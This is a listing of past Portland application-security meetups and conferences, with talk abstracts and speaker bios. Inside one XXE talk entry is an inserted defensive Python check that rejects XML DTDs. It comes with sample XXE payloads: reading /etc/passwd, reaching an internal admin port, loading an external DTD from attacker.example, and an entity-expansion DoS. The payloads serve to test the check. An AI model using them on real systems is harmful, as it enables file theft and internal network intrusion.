Viewing 30 past events matching “OWASP” by Event Name.

Monday
May 21, 2018
2018 Spring Training: IT Security and Audit Symposium
through Clackamas Community College - Wilsonville

Spring Training

Day 1:

1) Keynote: Blockchain: More than Cryptocurrency: Michael Reed (Intel)

Presentation on the origin of blockchain technologies and their evolution into a key technology in the pursuit of increased efficiencies and new business models. Is your enterprise ready for blockchain?

2) Micro Segmentation and Cloud - A blueprint for protecting your golden egg: Tyler Hardison (RedHawk Security) (EVENT SPONSOR)

3) Benefiting from PCI – Even if Compliance is Not Required: Bowe Hoy (Sword&Shield) and Mike Griffin (Circle K Stores, Inc.)

The Payment Card Industry Data Security Standard (PCI DSS) can be beneficial to your organization, even if compliance to it is not a requirement. PCI DSS features a number of valuable guidelines to help your organization improve its security posture, technology auditing, and business operations. This session will help you understand the key components of PCI DSS and how your organization can benefit from implementing it. You will receive practical lessons through case studies about organizations that have successfully implemented PCI DSS. Whether these organizations were required to comply with PCI DSS, or chose to adopt it – they became a better organization because of it. And you can learn how to do the same for your organization.

4) Certificate Security and Frameworks for a Public CA: Derek Thomas and Scott Perry

As the ubiquity of on-line shopping continues to amplify our digital environment, ensuring a trusted on-line transaction becomes critical to building the brand loyalty and experience once relished within the physical brick-and-mortar retailer. The ability to ensure a trusted and secure transaction is not new; however, the scrutiny placed on that trust is at an all-time high, with significant changes in the issuing community and growing pressure from the browser community for secure and reliable trusted certificates.

In this presentation, Scott Perry, Partner, and Derek Thomas, Managing Director, of Scott Perry CPA, one of six licensed CPA firms performing Certificate Authority audits, will discuss the changing landscape of on-line transactional trust and the requirements placed on Certificate Authorities. The presentation will include a discussion and overview of an established but less well-known framework for evaluating and auditing the performance of Certificate Authority practices, and considerations applied to evaluating the security of your on-line transactions.

Day 2: 5 Sessions: Various Presenters

5) Current Economics of Cyber: David Hobbs: Radware

Often we discuss the changing threat landscape from a purely technical or vulnerability-centric picture; however, this does an injustice to the elements of ease, cost and access to attacks. This presentation will provide attendees with an up-to-date picture of the rapidly changing landscape of attack tools and services, the buying criteria and locations for these tools, and their ease of use. In addition, the presentation will provide an understanding of how the combination of the proliferation of these tools and their corresponding use has dramatically changed the dynamics of the return on defense strategies. This presentation will provide unique insight into the world of the Darknet, specific customer attack stories, new economic models for measuring security deployments and a refreshed look at how controls should be deployed going forward.

6) Cyber War Chronicles - Stories From the Virtual Trenches (ERT Report 2017): David Hobbs: Radware

From information shared by over 1250 companies on their top concerns, we talk about what happened in 2017 and predict the top trends of 2018 in cyber security. The first half of 2017 saw a continuation of some cyber-security threats, as well as the emergence of new attack types and trends. Ransom attacks, political hacks, and new dynamics around the accessibility and capability of attack tools have added even more challenges to security. This session will explore some of the latest evolutions of the threat landscape through a combination of market intelligence, real-world case studies, and direct insights from those on the front lines of cyber-security.

7) OWASP Updated Top 10: Alex Ivkin (ISACA Board)

A detailed technical review of the OWASP Top 10.

8) The Value of Cyber Certifications: Alex Ivkin (ISACA Board)

9) Fraud Audit in a Digital Environment: Sarah Dalton: E&Y

CPE: 14 CPE

Cost:

Regular Pricing: On or After 4/20/18:

ISACA or IIA Member: $185

Non-Member: $225

We hope to see you there!

Saturday
Jun 19, 2021
AppSec Pacific Northwest

PNWSEC, a.k.a. the Pacific Northwest Application Security Conference, is a free application security conference that will be held Saturday, June 19th. It is a virtual, online event sponsored by the OWASP chapters of Portland, Vancouver, and Victoria.

Kymberlee Price and Jim Manico to keynote! All of the speakers and workshops can be found on the website: https://pnwcon.com/

Stretching the Truth: Attacking the Elastic Agent By Zander Work

Starting Left with Cloud Security By Stefania Chaplin

Fuzzing Python Native Extensions By Lucas Amorim

CVE-2020-17049: Kerberos Bronze Bit Attack By Jake Karnes

Zero-Trust - The Paradigm Shift Required in a Post-pandemic World By Timothy Morgan

Ad-Tech for Security People By Will Whittaker

Secure Coding of Industrial Control Systems By Vivek Ponnada

Six Ways Known-vulnerabilities Sneak Into Docker Containers By Julius Musseau

Effects Malware Hunting in Cloud Environment By Filipi Pires

Honeytokens: Detecting attacks to your web apps using decoys and deception By Dana Epp

Don’t B-MAD: Making Threat Modeling Less Painful By Adam Shostack

Women in Appsec: Advice to Differentiate Your Skills By Aarti Gadhia

Cultivating Cyber Warriors By Patterson Cake

Insiders Guide to Mobile AppSec with OWASP MASVS By Brian Reed

Follow us on Twitter at @pnwseccon to see when the workshops are going to be released.

Wednesday
May 19, 2021
Application Security -- The Framework, Processes and Tools to Secure Your Apps
Virtual

RSVP: https://www.meetup.com/OWASP-Portland-Chapter/events/277480846/

Excerpt:

Traditionally, breaches that make the news are about stealing data and that data being resold for financial gain. Think Target, Ashley Madison, Marriott and so many more. Recently a spotlight was put on supply chain security via the SolarWinds breach and how it affected many companies. The adversaries were able to inject malicious code into applications that have a lot of rights and are widely deployed in many organizations, small and large alike.

We will discuss the framework, your SDLC (SDL, SSDLC, etc.) – Secure Development Lifecycle – to lay out how you are going to develop and secure your applications. Customers care about this. Once you have your SDLC, you need to define your processes, select your tools, integrate them into your SDLC and finally automate those tools. This is not a short process and often multiple iterations are necessary to get to a good place. The goal of this presentation is to make you aware of a variety of tools that are out there, the various steps along the way of your SDLC you need to take and how to complete each of these steps.

BIO:

Derek Hill has over 25 years of experience in Information Security and Information Technology. He is currently the Director of AppSec Engineering at ForgeRock, an Identity and Access Management company based in Vancouver, WA. He is responsible for implementing and improving the company’s product security on a continual basis. He works closely with software engineers and security engineers in multiple countries to ensure the ForgeRock products are developed securely and tested in all phases of the development lifecycle. In addition to his full-time job, Derek is also a SANS community instructor teaching Security Leadership and CISSP prep courses.

Prior to his current position, Derek held Information Security, IT management and technical roles at both large and small companies. In each role, he consistently focused on managing high-performing teams, delivering efficient solutions and providing excellent services to a variety of stakeholders, maximizing uptime and security. Derek also has significant experience in cloud technologies, responsible for moving, securing and maintaining them in various cloud environments through their lifecycle.

Thursday
Sep 12, 2013
Application Security using OWASP
Thetus Corporation

EVENT INFORMATION

Application security is a moving target, but the Open Web Application Security Project (OWASP) is here in Portland to help you write and deploy applications securely. Speakers James Bohem and Tim Morgan will walk you through all of the free resources made available by OWASP to developers, application architects, and information security professionals.

As an example of how OWASP can help, we'll present some of the finer points of secure web session management, covering the variety of attacks on SSL-protected web traffic if sites are not configured properly. We'll touch on cookies, state management, SSL and some common problems and solutions.

Q&A will follow. Pizza and beverages will be served.

SPEAKER INFORMATION

James Bohem manages the security program at WebMD Health Services, which includes a large web-based application with millions of users, as well as other security technologies and risk management for a 400+ person division of WebMD in Portland. James has 15 years in security consulting with a focus on application security, design and technical compliance with a range of regulations and standards. In addition, he has experience developing large distributed applications, microkernels, the UNIX kernel, and international software systems for open systems.

Tim Morgan has been taking deep technical dives in security for over a decade as an application security specialist and vulnerability researcher. Tim resides in Oregon and works at VSR, where he helps to secure his customers' environments through penetration testing, training and forensic investigations. Tim also develops and maintains several open source digital forensics tools, including Bletchley, an application cryptanalysis toolkit.

Tuesday
Mar 3, 2020
Exploring OWASP Juice Shop (with Burp Suite)
CTRL-H

In this class, we’ll be exploring how to find the vulnerabilities in OWASP Juice Shop with Burp Suite (and maybe some other security tools if we have time). You’ll learn to set up the environment so you can play with it in your own time, as well as how to practically apply the different features of Burp Suite and when it is and isn’t the optimal tool. This will help you reproduce security vulnerabilities or find them for bug bounty programs.

Bio: Jordan is an Application Security Engineer at New Relic and a graduate from the University of Pittsburgh with a degree in computer science. She’s Champion ranked in Rocket League and does yoga in her free time.

Seating is limited

RSVP: https://www.meetup.com/OWASP-Portland-Chapter/events/269026936/

OWASP Juice Shop: https://owasp.org/www-project-juice-shop/

Burp Suite CE: https://portswigger.net/burp/releases/professional-community-2020-1?requestededition=community

Monday
Sep 19, 2016
FutureTalks Security Panel
New Relic

Building Security In?

Please RSVP via our Meetup group.

Everybody wants to write secure code, and yet it’s hard to find a dev team that truly owns application security. Instead, a small and external security team is tasked with keeping the constant and large amount of produced functionality secure. As we can see in daily headlines, this approach is not working, and is breaking down further in the face of high efficiency continuous deployment.

How can we fix it?

In this panel, three experts who deal with this problem on a daily basis will debate the ways dev teams can step up and build security in, touching best practices, tools, where to get started and much more.

• Guy Podjarny, CEO at Snyk

Guy (@guypod) is a cofounder at Snyk.io, focusing on securing open source code. Guy was previously CTO at Akamai and founder of Blaze.io, and worked on the first web app firewall & security code analyzer. Guy is a frequent conference speaker, the author of “Responsive & Fast”, “High Performance Images” and the upcoming “Securing Open Source Code”.

• John Steven, CTO, Cigital and Codiscope

John’s expertise runs the gamut of software security—from threat modeling and architectural risk analysis to static analysis and security testing. He has led the design and development of business-critical production applications for large organizations in a range of industries. Since joining Cigital as a security researcher in 1998, John has provided strategic direction and built security groups for many multi-national corporations, including Coke, EMC, Qualcomm, Marriott and Finra. His keen interest in automation continues to keep Cigital technology at the cutting edge. Presently, he serves as internal CTO of Cigital and CTO of Codiscope. He has served as co-editor of the Building Security In department of IEEE Security & Privacy magazine, and as the leader of the Northern Virginia OWASP chapter. He speaks regularly at conferences and trade shows. Follow John on Twitter @m1splacedsoul.

• Omri Iluz, Co-founder and CEO, PerimeterX

Omri is the CEO and cofounder of PerimeterX. After spending a decade and a half building and securing web-scale infrastructure at companies such as Akamai, Cotendo and iPlay, Omri decided to focus on ridding the web of bots and other automated threats. With experience that spans everything from writing code and malware reversing to modern web architecture, Omri provides a unique point of view on the current state of web security.

Details

• Doors will open at 5:30 for a 30-minute networking happy half-hour! The food, beer and drinks are provided by Bellagios and New Relic.

• The presentation will begin right at 6pm.

• NOTE: after the event, everyone is invited to continue networking at a special happy hour opportunity, one story up at Portland City Grill.

Stay tuned for the latest developments and updates on this and upcoming events by joining our Meetup group, New Relic FutureTalks PDX (link above), and following us on Twitter @newrelic. Check out our blog for event recaps and videos.

FutureTalk is brought to you by New Relic in collaboration with TAO.

Thursday
Jan 18
Hacking a SaaS: A Practical Guide to Understanding Attack and Defense
Solutional Inc

Hacking a SaaS: A Practical Guide to Understanding Attackers and Defending Against Them

In this talk, we will delve into the mindset of an attacker and explore the vulnerabilities they exploit in SaaS systems. We will cover the following topics:

• What motivates hackers to target SaaS systems (5%)

• How hackers conduct reconnaissance on SaaS systems (50%)

• The anatomy of exploit chains (40%)

• Strategies for defending against attacks (5%)

Our goal is to provide a practical guide to understanding attackers and defending against them. We will share lots of hacker tips and tricks, and provide plenty of quiz moments to train your intuition. Our focus will be on vulnerabilities that hackers actually care about, rather than theoretical ones. All of our examples will be based on real-world exploit chains, and we will explore multiple vulnerabilities chained together to create media-news-headline-worthy outcomes. By the end of this talk, you will have a better understanding of how attackers think and operate, and you will be better equipped to defend against their attacks.

Our January host and sponsor is Solutional Inc, and the talk will take place in their Portland office at 301 SE 2nd Ave.

Please RSVP here if you are planning to attend.

This is a monthly event of OWASP's Portland chapter.

Thursday
Aug 4, 2011
How to Avoid Being the Next Security Breach Headline (OWASP v3)
Kells Irish Restaurant & Pub

Join the SAO's QA Forum for another dynamic lunch program, to learn about the Open Web Application Security (OWASP) Testing Guide v3 and how to verify the security of your running applications. This is a great opportunity to network with a great local speaker (Mike Hryekewicz, Software Engineer V, Standard Insurance Company) and industry peers and to find out about Oregon job openings and upcoming community events.

OWASP Testing Guide describes a set of techniques for finding different kinds of security vulnerabilities within an application. This technique is used by testers and developers to help produce secure code and to supplement security reviewers application assessment efforts.

This presentation will provide an overview of the guide, a road map for where it is heading in the next release, and guidance for how it can be applied in the business of producing secure software solutions.

Who should attend? Anyone interested in Web Application Security, including management, security professionals, developers, students, etc.

Agenda:

11:00am Doors open

11:00am-11:30am Registration, networking and lunch

11:30am Welcome & Community Announcements

11:45am Program starts

12:50pm Final questions

1:00pm Program ends

Thursday
Feb 20, 2014
ISSA February Luncheon meeting
Con-Way

Presentation: Pitfalls of Web Session Management

Login session management in modern web applications is largely dominated by the use of HTTP cookies. However, HTTP cookies were never designed for secure applications, which has led to a significant number of protocol security problems. In this talk, the speaker will start with a brief background on why HTTP cookies are a poorly-conceived mechanism to begin with, and continue with a discussion of how this impacts security. He will describe several lesser-known cookie-based session management problems that remain widespread and allow for session hijacking through a variety of clever attacks.

Who:
Timothy D. Morgan
Principal Security Consultant - Blindspot Security LLC
As an application security consultant and vulnerability researcher, Tim has been taking deep technical dives in security for over a decade. In that time, he has been credited with the discovery and responsible disclosure of numerous security vulnerabilities in a variety of software products, including: IBM Tivoli Access Manager, Sun Java Runtime Environment, Google Chrome Web Browser, OpenOffice, Oracle WebLogic Application Server, and IBM Websphere Commerce. His current research interests include applied cryptanalysis, IPv6 security and XML external entities attacks. Tim develops and maintains several open source forensics tools in addition to Bletchley, an application cryptanalysis toolkit.

Tim works to secure his customers' environments through black box testing, code reviews, social engineering evaluations, security training and a variety of other services. Tim earned his computer science degrees from Harvey Mudd College and Northeastern University and currently resides in Portland, Oregon, where he leads the local OWASP chapter.

Cost: $10 (member) / $15 (non-member) / $2 (at-the-door)

CPEs: The ISSA meetings are appropriate for CPE credit. The chapter maintains proof of attendance for members, but it is the member's responsibility to ensure that these CPEs are credited to their respective accounts.

Thursday
Oct 18, 2018
ISSA Portland panel discussion of current cyber threat landscape.
Columbia Square 8th Floor Conference Room

Join us for the ISSA Portland panel discussion of the current cyber threat landscape.

Thursday - October 18th, 2018 11:30AM - 1:00PM

Please register today via the Eventbrite notice at the link below:

https://www.eventbrite.com/e/panel-discussion-tracking-the-current-cyber-threat-landscape-tickets-50695136518

Panel Participants:

• Brian Ventura, Security Architect, City of Portland

• Craig Schippers, Principal Field Engineer, Trend Micro

• Cam Naghdi, Sales Engineering Manager, Malwarebytes

Moderator:

• Christopher Paidhrin, CISO, City of Portland

Topics to include:

• Quarterly update

• Trends in threat intelligence

• The role of AI in malware detection

• Defense in depth techniques

• Cloud defenses

Panel Participants:

Brian Ventura, Security Architect, City of Portland

About the panelist: Brian is an Information Security Architect for the City of Portland and a SANS Instructor. Brian volunteers with the ISSA Portland chapter as the Director of Education and with OWASP locally. Over the past 25 years, Brian achieved, holds, and now teaches various industry certifications including CISSP, GSEC, GCIH, GCFA, and GCCC. In addition to his Information Security persona, Brian is a member of the Timbers Army and Thorns Riveters, attending as many games as possible. Find Brian's teaching schedule: https://www.sans.org/instructors/brian-ventura

Cameron Naghdi, Systems Engineering Manager, Malwarebytes

About the panelist: Cameron Naghdi is the Systems Engineering Manager for US-West at Malwarebytes. Cameron has worked for multiple endpoint technology firms and has supported many vertical markets from retail and healthcare up to Federal/Civilian agencies and the Department of Defense. Cameron is also on the technology advisory board of 802Secure and is Co-Founder and CTO at FilecheckIO. Cameron specializes in understanding the threats of today and how to prepare solutions to address both today's and future security challenges.

Chris Sestito, Director of Threat Research, Cylance

About the panelist: Chris Sestito manages the Cylance Threat Research Team, which consists of 30 researchers dedicated to data-science-based analysis and automation development. Chris is based in Austin, Texas and is an eight-year veteran in information security with a wealth of experience in malware analysis and malvertising that helps ensure the security of Cylance customers. Chris also holds Sec+ and C|EH certifications.

Craig Schippers, Principal Field Engineer, Trend Micro

About the panelist: Craig Schippers is a CISSP Certified Principal Field Engineer at Trend Micro. He has worked in the security industry for approximately 17 years, assisting customers with their Infrastructure Security needs. Craig lives in Portland, Oregon.

Moderator: Christopher Paidhrin, CISO, City of Portland and ISSA Portland Vice-President

About the moderator: Christopher Paidhrin is the Chief Information Security Officer for the City of Portland, Oregon. For the past 17 years Christopher has been a nationally recognized healthcare Information Security authority, having received recognition, nominations and awards for service excellence, including Network World, ISE, SC Magazine, and Information Security magazine's 2011 "Security 7" Award. Christopher is a regular media consultant and presents at numerous events across the U.S. Christopher is an advocate of IT Service Management (ITSM) best practices and process improvement, including learning organizations and knowledge management.

This event is sponsored by: Malwarebytes and Trend Micro

Thursday
Apr 21, 2011
NW ISSA Security Summit

Hosted by the ISSA – Portland Chapter, the NW ISSA Security Summit, held in conjunction with InnoTech Oregon, returns April 21st to the Oregon Convention Center. Join us for this one-day, in-depth conference that highlights the latest in the IT Security landscape. If you only go to one conference this year, make this the one!

The NW ISSA Security Summit will feature three (3) distinct conference tracks:

1) Business

2) Application Development

3) Technology

Each track will be comprised of top-notch sessions from leading industry professionals. Whether you are an application developer, security manager, IT manager, engineer, auditor, CISO, CTO, Project Manager, or just simply interested in the security sector, the Summit is meaningful to you. Mark your calendars for April 21st and we’ll see you there! Go to www.nwsecuritysummit.com to register and for more information.

Sunday
Jan 13, 2013
OWASP - FLOSSHack Returns
Free Geek

FLOSSHack is an experimental workshop project designed to bring together those who want to learn more about "hacking" (secure programming and application penetration testing) with those who are in need of low cost or pro bono security auditing.

The target software for this FLOSSHack event is OpenMRS. For more info, see the event page.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Wednesday
Jan 9, 2013
OWASP - How to (FLOSS)Hack
Collective Agency Downtown

Join us for a How to (FLOSS)Hack tutorial, which will introduce several common classes of web application vulnerabilities such as XSS, SQL injection, and XML External Entities flaws. The goal of the session is to bring novice FLOSSHack participants up to speed on how to identify new vulnerabilities that are likely to appear in the target software for this week's FLOSSHack. FLOSSHack is an experimental workshop project designed to bring together those who want to learn more about "hacking" (secure programming and application penetration testing) with those who are in need of low cost or pro bono security auditing.

NOTE: For best results, please bring a laptop to participate in the hands-on exercises.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Tuesday
Jul 21, 2015
OWASP Chapter Meeting
New Relic

Talk

At the end of the day, security depends on code. Secure software demands secure code, configuration, management, testing, and constant improvement.

Security automation aligns perfectly with the modern, fast-paced environments like continuous delivery that are quickly seeping into companies of all kinds.

Automation provides drastic results with little effort, but quickly reaches a plateau where the effort involved in finding better results that provide value rises above the value of focusing elsewhere.

In this talk, I will focus on some of the lesser discussed topics of security automation and how they relate to the lines of code that produce the reason why we are discussing security automation today. The goal is to give a complete understanding of the ways that companies like _ and _ have produced secure code that runs their web applications.

Speaker

Neil is currently an engineer at GitHub, co-founder of Brakeman Security Inc., and OWASP Orange County board member. Formerly, he was an application security engineer at Twitter, OC Ruby leader, and AppSec California organizer. Neil enjoys long walks on the beach, long walks in the woods, and long walks anywhere really. His turnoffs include noisy offices, noisy people, and noisy anything really.

Wednesday
Jun 17, 2015
OWASP Chapter Meeting
Jive Software

Bob Loihl will be presenting:
Secure Software Development Life Cycle in an Agile World

In this day and age we must do everything we can to produce secure software. But how, you ask? I will be talking about some of the options available and how to get an initiative started in your workplace/project. I will cover some of the choices out there for Agile Development and then we'll examine one choice, BSIMM (https://www.bsimm.com/), in more depth. I will follow that up with a discussion of some of the challenges and some of the benefits of implementing an SSDLC.

Bob Loihl is a Software Engineer with 20+ years of experience developing business applications, leading teams and spreading the security word. He has a strong interest in delivering applications that are secure by design in an agile world. He has been helping Tripwire grow and mature its development processes for the last 10 years and his current hobby is incorporating SSDLC (Secure Software Development Life-Cycle) processes into the software manufacturing process. Bob is passionate about family, software, canoes and guitars. In his spare time he works at Tripwire producing high quality software using Agile methodologies. Oh yeah, he cares a tiny bit about security.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Tuesday
Mar 31, 2015
OWASP Chapter Meeting
New Relic

People in Information Security say passwords are dead. Yet the replacement solutions are not available or mainstream. An independent developer, Steve Gibson, decided to do something about it and created SQRL. From his website: "Proposing a comprehensive, easy-to-use, high security replacement for usernames, passwords, reminders, one-time-code authenticators . . . and everything else." Let's talk about what SQRL is, how it works, how it could work in your solution, and whether it has competitors. I am as interested in your feedback as I hope you are interested in resolving the password problem!

Brian Ventura is an Information Security Architect at the City of Portland with 21 years of experience in IT. Brian has enterprise, consulting and project management experience, supplying secure solutions to internal and external customers. Brian is mentoring a SANS MGT414 course in Portland between April 14th and June 16th. You can find more information at https://www.sans.org/instructors/brian-ventura

Friday
Feb 13, 2015
OWASP Chapter Meeting
New Relic

Software development is speeding up; Waterfall to Agile to Continuous Integration to Continuous Deployment. Do we still have time for security? Of course we do! But many development shops are unaware how to add security to their development process and will often use "security slows us down" as a reason to produce insecure code. This talk focuses on how to add security into a speedy development process while still remaining fast and responsive to customer requests.

The speaker will be Joe Basirico - the VP of Services for Security Innovation. Before he started leading the team, he was a developer, trainer, researcher, and security engineer. Joe spent the majority of his professional career analyzing software security behavior and researching how software development organizations mature over time from a security perspective. Through this research, he developed an understanding of application threats, tools, and methodologies that assist in the discovery and removal of security problems both software- and process-related. He manages the company’s engineering blog and has written several publications and tools that focus on source code level vulnerabilities.

Thursday
Dec 4, 2014
OWASP Chapter Meeting
New Relic

Joseph Arpaia, MD will be presenting: Hiding in Plain Sight: A Mnemonic Method For Creating Secure Passwords

The human brain is not suited to recalling secure passwords composed of random sequences of characters especially if they are not used regularly. Humans are excellent at recalling sentences, even years after learning them, e.g. nursery rhymes, song lyrics. This ability can be used to create a mnemonic method for generating a large number of passwords from one remembered passphrase, even if the passphrase and the associated characters are not kept secret.

Joseph Arpaia received his BS in Chemistry from CalTech and his MD from UC Irvine where he also did research in electrophysiology and applications of chaos theory to psychiatry. He is a psychiatrist in private practice in Eugene, OR and applies heart rate variability analysis in his work with patients. He also teaches applications of mindfulness meditation to psychotherapy at the University of Oregon and is the co-author of Real Meditation in Minutes a Day. He has a long-standing interest in passwords and security which dates back to his experience at age 8 when he came up with a Vernam cipher in response to a challenge by his father to encrypt a text message.


The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland


Meetings are free and open to the public.

Website
Tuesday
Jul 22, 2014
OWASP Chapter Meeting
New Relic

Tim Morgan will be presenting: What You Didn't Know About XML External Entities Attacks

The eXtensible Markup Language (XML) is an extremely pervasive technology used in countless software projects. Certain features built into the design of XML, namely inline schemas and document type definitions (DTDs), are a well-known source of potential security problems. Despite being publicly discussed for more than a decade, a significant percentage of software using XML remains vulnerable to malicious schemas and DTDs. This talk will describe a collection of techniques for exploiting XML external entities (XXE) vulnerabilities, some of which we believe are novel. These techniques can allow for more convenient file content theft, sending of arbitrary data to arbitrary internal TCP services, uploads of arbitrary files to known locations on a vulnerable system, as well as several possible denial of service attacks. We hope this talk will raise awareness about the overall risk associated with XXE attacks and will provide recommendations that developers and XML library implementors can use to help prevent these attacks.
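The recommendation developers most often take away from XXE talks is to refuse DTDs entirely, since file theft, requests to internal TCP services and entity-expansion denial of service all ride on a DOCTYPE. The following is an added example (not the speaker's code or any tool of his) that enforces that rule before the real parser sees the bytes, using only the Python standard library; the sample documents, host names and paths in it are constructed for illustration and are not real targets.

```python
"""Pre-parse DTD rejection for untrusted XML (added example, not from the talk).

Every XXE-class attack needs a DOCTYPE: external entities for file theft and
internal-service requests, parameter entities for out-of-band exfiltration,
nested internal entities for expansion DoS. Refusing any DOCTYPE up front
removes the class regardless of which XML library parses the document later.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DtdForbidden(ValueError):
    """Raised when the document carries a DOCTYPE and therefore may carry entities."""


def assert_no_dtd(data: bytes) -> None:
    """Walk the input with a bare expat parser and abort at the first DOCTYPE.

    No ExternalEntityRefHandler is installed, so this pass never fetches a
    SYSTEM identifier itself; a malformed document raises ExpatError instead.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden(f"DOCTYPE {name!r} rejected (sysid={sysid!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def is_dtd_free(data: bytes) -> bool:
    """Verdict form of the check for callers that prefer a boolean."""
    try:
        assert_no_dtd(data)
    except DtdForbidden:
        return False
    return True


def safe_parse(data: bytes) -> ET.Element:
    """Parse untrusted XML only after the DTD check has passed."""
    assert_no_dtd(data)
    return ET.fromstring(data)


# Constructed sample inputs (placeholders, not real hosts or targets).
BENIGN = b'<?xml version="1.0"?><order><item>widget</item><qty>2</qty></order>'

# File content theft: the entity expands to the file's contents inside the tree.
XXE_FILE = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<r>&xxe;</r>')

# Reaching an internal TCP service: the parser, not the attacker, opens the connection.
XXE_INTERNAL = (b'<?xml version="1.0"?>'
                b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/admin">]>'
                b'<r>&xxe;</r>')

# Out-of-band variant: a parameter entity loads a remote DTD that defines what to send.
XXE_OOB = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]>'
           b'<r/>')

# Entity-expansion denial of service, kept tiny so the sample itself is harmless.
XXE_DOS = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE r [<!ENTITY a "aaaaaaaaaa">'
           b'<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">]>'
           b'<r>&b;</r>')

# DOCTYPE text inside a comment is not a DTD: a string grep would reject this
# document, the parser-driven check correctly accepts it.
COMMENT_ONLY = b'<!-- <!DOCTYPE r> --><r>ok</r>'


if __name__ == "__main__":
    samples = [("benign", BENIGN), ("file", XXE_FILE), ("internal", XXE_INTERNAL),
               ("oob", XXE_OOB), ("dos", XXE_DOS), ("comment", COMMENT_ONLY)]
    for label, doc in samples:
        print(f"{label:9s} dtd_free={is_dtd_free(doc)}")
```

The check runs before deserialization, so it also protects libraries whose entity-handling switches are easy to get wrong; the cost is that legitimate documents with DTDs must be rejected or handled by a separate, explicitly hardened path.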

Tim Morgan is credited with the discovery and responsible disclosure of several security vulnerabilities in commercial off-the-shelf and open source software including: IBM Tivoli Access Manager, Real Networks Real Player, Sun Java Runtime Environment, Google Chrome Web Browser, OpenOffice, and Oracle WebLogic Application Server. Tim develops and maintains several open source forensics tools as well as Bletchley, an application cryptanalysis tool kit. Tim regularly speaks and delivers technical training courses, the next of which will be on cryptography for developers at AppSecUSA 2014.


The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland


Meetings are free and open to the public.

Website
Thursday
May 29, 2014
OWASP Chapter Meeting
New Relic

Ian Melven will be presenting: The Evolving Web Security Model


Is there a single cohesive model for the web? No, there is not. What exists today is the result of the original same-origin policy and its evolution in many directions as a response to new threats and attacks. Where did we start, what tools are available to web developers to protect their sites and users, and where might we go in the future as the line between websites and native applications continues to become more and more blurry? Join us on a journey through the past, present, and future of the web security model and its continuing evolution.

Ian Melven is an application security engineer at New Relic. He has previously worked in technical security roles at companies including Mozilla, Adobe, McAfee, Symantec, and @stake.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Website
Wednesday
Apr 2, 2014
OWASP Chapter Meeting
Jive Software

Kevin Dyer will be presenting:


High-Profile Password Database Breaches: A Tale of (Avoidable) Blunders

Over the last few years, password database breaches reported in the mainstream press have increased in frequency and magnitude. There is a typical pattern: service providers such as Adobe, Yahoo or Snapchat fail on at least two fronts. First, network perimeters and databases are breached; then, improperly secured user data and passwords are exfiltrated and shared in cleartext. Even if the former can't be prevented, there are security best practices to mitigate the impact of the latter, which are (seemingly) ignored.

In this talk, we'll discuss specific case studies and review the essential security best practices for storing sensitive user information. The goal is to show that in every case free, off-the-shelf tools are available that would have mitigated the scope of the breach and (possibly) the onslaught of negative publicity. As one example, we'll build intuition for why using scrypt (a memory-hard function) is superior to traditional cryptographic hash functions for storing passwords.

Kevin P. Dyer is a PhD student at Portland State University. His research focuses on network security and building protocols resistant to traffic-analysis attacks and censorship. Previously, Kevin worked as a software engineer in telecommunications security, web security and network security. He holds an MSc in the Mathematics of Cryptography and Communications from Royal Holloway, University of London, and a BS in Computer Science with Mathematics from Santa Clara University.


The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Website
Monday
Jan 6, 2014
OWASP Chapter Meeting
New Relic

Stephen A. Ridley will be presenting on the vulnerability of mobile applications

UPDATE: New Relic will be providing pizza for attendees. Yum.



Stephen A. Ridley is a security researcher and author with more than 10 years of experience in software development, software security, and reverse engineering. Within the last few years, he has presented his research and spoken about reverse engineering and software security research on every continent except Antarctica. Stephen and his work have been featured on NPR and NBC and in Wired, Washington Post, Fast Company, VentureBeat, Slashdot, The Register, and other publications. Prior to his current work, Mr. Ridley served as the Chief Information Security Officer of a financial services firm. Before that, he held various information security researcher and consultant roles, including a role as a founding member of the Security and Mission Assurance (SMA) group at a major U.S. Defense contractor, where he did vulnerability research and reverse engineering in support of the U.S. Defense and Intelligence community. Mr. Ridley calls Portland home and was a recent speaker at the Chaos Communication Congress in Hamburg.

